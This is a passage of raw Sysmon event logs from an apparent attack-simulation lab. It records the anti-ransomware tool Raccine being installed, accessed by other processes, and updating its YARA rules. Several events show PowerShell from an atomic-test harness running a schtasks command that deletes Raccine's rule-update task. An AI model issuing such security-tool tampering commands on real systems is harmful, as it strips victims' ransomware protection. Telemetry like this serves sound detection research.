Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003406Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.478{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003405Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.478{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003404Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.478{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003403Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.478{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003402Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.478{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003401Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.478{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003400Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.478{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003399Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.478{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003398Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.478{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003397Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.478{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003396Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.478{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003395Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.478{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003394Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.478{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003393Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.478{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003392Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.478{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003391Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.478{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003390Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.478{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003389Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.478{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003388Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.478{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003387Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.478{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003386Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.478{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003385Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.478{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003384Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.478{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000001968862Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:01.671{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D37106C) 10341000x80000000000000001968528Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:30:14.494{9DBE88B5-2F14-61B2-9603-010000000E02}80647984C:\Windows\explorer.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6165f|C:\Windows\System32\SHELL32.dll+62a85|C:\Windows\explorer.exe+5cf54|C:\Windows\explorer.exe+5c591|C:\Windows\explorer.exe+5a5a3|C:\Windows\explorer.exe+5983c|C:\Windows\explorer.exe+56de3|C:\Windows\explorer.exe+4bb4d|C:\Windows\explorer.exe+49f72|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+28e4e|C:\Windows\SYSTEM32\ntdll.dll+a9824|UNKNOWN(FFFFF8028EAE4D08)|UNKNOWN(FFFF85E39F30E8DF)|UNKNOWN(FFFF85E39F2A5D52)|UNKNOWN(FFFF85E39F2A0351)|UNKNOWN(FFFF85E39F2A3638)|UNKNOWN(FFFF85E39F2A7A29)|UNKNOWN(FFFF85E39F2A8553)|UNKNOWN(FFFF85E39F2A9214)|UNKNOWN(FFFF85E39F2A9110) 10341000x80000000000000001968527Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:30:14.494{9DBE88B5-2F14-61B2-9603-010000000E02}80647984C:\Windows\explorer.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6299e|C:\Windows\explorer.exe+5cf54|C:\Windows\explorer.exe+5c591|C:\Windows\explorer.exe+5a5a3|C:\Windows\explorer.exe+5983c|C:\Windows\explorer.exe+56de3|C:\Windows\explorer.exe+4bb4d|C:\Windows\explorer.exe+49f72|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+28e4e|C:\Windows\SYSTEM32\ntdll.dll+a9824|UNKNOWN(FFFFF8028EAE4D08)|UNKNOWN(FFFF85E39F30E8DF)|UNKNOWN(FFFF85E39F2A5D52)|UNKNOWN(FFFF85E39F2A0351)|UNKNOWN(FFFF85E39F2A3638)|UNKNOWN(FFFF85E39F2A7A29)|UNKNOWN(FFFF85E39F2A8553)|UNKNOWN(FFFF85E39F2A9214)|UNKNOWN(FFFF85E39F2A9110)|UNKNOWN(FFFFF8028E7FD103) 10341000x80000000000000001968526Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:30:14.494{9DBE88B5-2F14-61B2-9603-010000000E02}80647984C:\Windows\explorer.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618b4|C:\Windows\System32\SHELL32.dll+62967|C:\Windows\explorer.exe+5cf54|C:\Windows\explorer.exe+5c591|C:\Windows\explorer.exe+5a5a3|C:\Windows\explorer.exe+5983c|C:\Windows\explorer.exe+56de3|C:\Windows\explorer.exe+4bb4d|C:\Windows\explorer.exe+49f72|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+28e4e|C:\Windows\SYSTEM32\ntdll.dll+a9824|UNKNOWN(FFFFF8028EAE4D08)|UNKNOWN(FFFF85E39F30E8DF)|UNKNOWN(FFFF85E39F2A5D52)|UNKNOWN(FFFF85E39F2A0351)|UNKNOWN(FFFF85E39F2A3638)|UNKNOWN(FFFF85E39F2A7A29)|UNKNOWN(FFFF85E39F2A8553)|UNKNOWN(FFFF85E39F2A9214)|UNKNOWN(FFFF85E39F2A9110) 10341000x80000000000000001962749Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:10:21.671{9DBE88B5-C32E-61A8-0C00-000000000E02}8484388C:\Windows\system32\svchost.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79d4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f61d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001962679Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:10:21.671{9DBE88B5-C32E-61A8-0C00-000000000E02}8484388C:\Windows\system32\svchost.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79d4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f61d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001951933Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 13:29:43.242{9DBE88B5-C32E-61A8-0C00-000000000E02}8483364C:\Windows\system32\svchost.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79d4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f61d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001951864Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 13:29:43.239{9DBE88B5-C32E-61A8-0C00-000000000E02}8483364C:\Windows\system32\svchost.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79d4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f61d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x80000000000000001898376Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:13:47.633{9DBE88B5-C32E-61A8-1600-000000000E02}1280NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\System32\Tasks\Raccine Rules UpdaterMD5=507D4E20DD101D725A3549D1C55DFD6A,SHA256=8909D9A81ACD05D9B90636AA72FC803BD871FBB18579038678E260794248A68F,IMPHASH=00000000000000000000000000000000falsetrue 154100x80000000000000001898365Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:13:47.635{9DBE88B5-11FB-61B1-A5FF-000000000E02}4676C:\Windows\System32\schtasks.exe10.0.14393.0 (rs1_release.160715-1616)Task Scheduler Configuration ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationsctasks.exe"C:\Windows\system32\schtasks.exe" /DELETE /TN "Raccine Rules Updater" /FC:\Users\Administrator\AtomicTestHarnesses\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=EEB7A2162E4DBE32B56BEB84658483AE,SHA256=A9A4FD9C1BB7C5CF8F77F761CAE60F4AC4AFB8DAEEBB46B3AD6983D5E599CDC1,IMPHASH=8AC94113AD25518D369E4EE37BEDAB4F{9DBE88B5-3AAE-61AE-0DA8-000000000E02}6776C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 154100x80000000000000001898325Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:13:28.199{9DBE88B5-11E8-61B1-A4FF-000000000E02}5732C:\Windows\System32\schtasks.exe10.0.14393.0 (rs1_release.160715-1616)Task Scheduler Configuration ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationsctasks.exe"C:\Windows\system32\schtasks.exe" /DELETE /TN \ Raccine Rules Updater\ /FC:\Users\Administrator\AtomicTestHarnesses\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=EEB7A2162E4DBE32B56BEB84658483AE,SHA256=A9A4FD9C1BB7C5CF8F77F761CAE60F4AC4AFB8DAEEBB46B3AD6983D5E599CDC1,IMPHASH=8AC94113AD25518D369E4EE37BEDAB4F{9DBE88B5-3AAE-61AE-0DA8-000000000E02}6776C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 154100x80000000000000001898316Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:13:27.438{9DBE88B5-11E7-61B1-A3FF-000000000E02}2676C:\Windows\System32\schtasks.exe10.0.14393.0 (rs1_release.160715-1616)Task Scheduler Configuration ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationsctasks.exe"C:\Windows\system32\schtasks.exe" /DELETE /TN \ Raccine Rules Updater\schtasks.exe /DELETE /TN \ Raccine Rules Updater\ /F /FC:\Users\Administrator\AtomicTestHarnesses\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=EEB7A2162E4DBE32B56BEB84658483AE,SHA256=A9A4FD9C1BB7C5CF8F77F761CAE60F4AC4AFB8DAEEBB46B3AD6983D5E599CDC1,IMPHASH=8AC94113AD25518D369E4EE37BEDAB4F{9DBE88B5-3AAE-61AE-0DA8-000000000E02}6776C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 154100x80000000000000001898175Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:12:51.918{9DBE88B5-11C3-61B1-9BFF-000000000E02}2832C:\Windows\System32\schtasks.exe10.0.14393.0 (rs1_release.160715-1616)Task Scheduler Configuration ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationsctasks.exe"C:\Windows\system32\schtasks.exe" /DELETE /TN \ Raccine Rules Updater\ /FC:\Users\Administrator\AtomicTestHarnesses\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=EEB7A2162E4DBE32B56BEB84658483AE,SHA256=A9A4FD9C1BB7C5CF8F77F761CAE60F4AC4AFB8DAEEBB46B3AD6983D5E599CDC1,IMPHASH=8AC94113AD25518D369E4EE37BEDAB4F{9DBE88B5-3AAE-61AE-0DA8-000000000E02}6776C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 154100x80000000000000001898159Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:12:48.050{9DBE88B5-11C0-61B1-9AFF-000000000E02}6364C:\Windows\System32\schtasks.exe10.0.14393.0 (rs1_release.160715-1616)Task Scheduler Configuration ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationsctasks.exe"C:\Windows\system32\schtasks.exe" /DELETE /TN \ Raccine Rules Updater\ /FC:\Users\Administrator\AtomicTestHarnesses\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=EEB7A2162E4DBE32B56BEB84658483AE,SHA256=A9A4FD9C1BB7C5CF8F77F761CAE60F4AC4AFB8DAEEBB46B3AD6983D5E599CDC1,IMPHASH=8AC94113AD25518D369E4EE37BEDAB4F{9DBE88B5-3AAE-61AE-0DA8-000000000E02}6776C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 154100x80000000000000001897419Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:48.827{9DBE88B5-1148-61B1-86FF-000000000E02}980C:\Windows\System32\findstr.exe10.0.14393.0 (rs1_release.160715-1616)Find String (QGREP) UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationFINDSTR.EXEfindstr /b ::: "C:\Users\Administrator\Downloads\Raccine\Raccine\install-raccine.bat"C:\Users\Administrator\Downloads\Raccine\Raccine\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=15B171EC73E7B71F4EBB4247E716271E,SHA256=2956F7BC863498DFCC868CE7DF4C9C131A4A5C17B065658456AFEF7566ACE1EE,IMPHASH=D7962312082AAB17974D6817E09E5D7A{9DBE88B5-1148-61B1-85FF-000000000E02}1292C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c findstr /b ::: "C:\Users\Administrator\Downloads\Raccine\Raccine\install-raccine.bat" 154100x80000000000000001897411Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:48.782{9DBE88B5-1148-61B1-85FF-000000000E02}1292C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c findstr /b ::: "C:\Users\Administrator\Downloads\Raccine\Raccine\install-raccine.bat"C:\Users\Administrator\Downloads\Raccine\Raccine\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{9DBE88B5-1126-61B1-57FF-000000000E02}3172C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\Downloads\Raccine\Raccine\install-raccine.bat" " 23542300x80000000000000001897351Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:33.994{9DBE88B5-1135-61B1-82FF-000000000E02}6820NT AUTHORITY\SYSTEMC:\Program Files\Raccine\RaccineRulesSync.exeC:\Program Files\Raccine\yara\ryuk-commandlines.yarMD5=6295C17ED7D8E37899E8C9F4D1A5182F,SHA256=3A7334E0F074949B24CB0C6AE1D60E2447BEC9E78D9ED6ABBF0112508E25C095,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001897350Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:33.847{9DBE88B5-1135-61B1-82FF-000000000E02}6820NT AUTHORITY\SYSTEMC:\Program Files\Raccine\RaccineRulesSync.exeC:\Program Files\Raccine\yara\powershell_loaders.yarMD5=A3DA4AE0C4939DB63A7E65A409375B3E,SHA256=97379E15046D7EE081E3B729193D3609E0679CAD719455A3B06F32C62791EADC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001897349Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:33.579{9DBE88B5-1135-61B1-82FF-000000000E02}6820NT AUTHORITY\SYSTEMC:\Program Files\Raccine\RaccineRulesSync.exeC:\Program Files\Raccine\yara\mal_revil.yarMD5=3685C5F3760B850367F9F170510A4C09,SHA256=6945E983DBB57FE8EE46713559393F12FFB35995A93755D6656F8DF79DA85587,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001897346Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:33.395{9DBE88B5-1135-61B1-82FF-000000000E02}6820NT AUTHORITY\SYSTEMC:\Program Files\Raccine\RaccineRulesSync.exeC:\Program Files\Raccine\yara\mal_exchange_cryptominer.yarMD5=8E5E8F275DEA9CA5B7C7A6B466EA6C87,SHA256=335AFB1B376EFB95C6304D75C090C50A1598B88EBB26799CAB00A2EFF3AD17E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001897345Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:33.264{9DBE88B5-1135-61B1-82FF-000000000E02}6820NT AUTHORITY\SYSTEMC:\Program Files\Raccine\RaccineRulesSync.exeC:\Program Files\Raccine\yara\mal_emotet.yarMD5=91B84EC8BB0A4B6153392144D1A9BBBD,SHA256=02754A7F21D6667AA330CD3F00164F7C3EDD474267ACD882B66EF42C9BE59CDF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001897344Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:33.111{9DBE88B5-1135-61B1-82FF-000000000E02}6820NT AUTHORITY\SYSTEMC:\Program Files\Raccine\RaccineRulesSync.exeC:\Program Files\Raccine\yara\mal_darkside.yarMD5=008207803640DD1E7F3A187C1D4BDD8D,SHA256=CE3A48E25A86E42C988CE73971923B7EC5F82AF99446EEB1FB1B6E3A6B641A00,IMPHASH=00000000000000000000000000000000falsetrue 22542200x80000000000000001897343Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:26.749{9DBE88B5-1135-61B1-82FF-000000000E02}6820raw.githubusercontent.com0::ffff:185.199.111.133;::ffff:185.199.109.133;::ffff:185.199.108.133;::ffff:185.199.110.133;C:\Program Files\Raccine\RaccineRulesSync.exe 10341000x80000000000000001897342Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 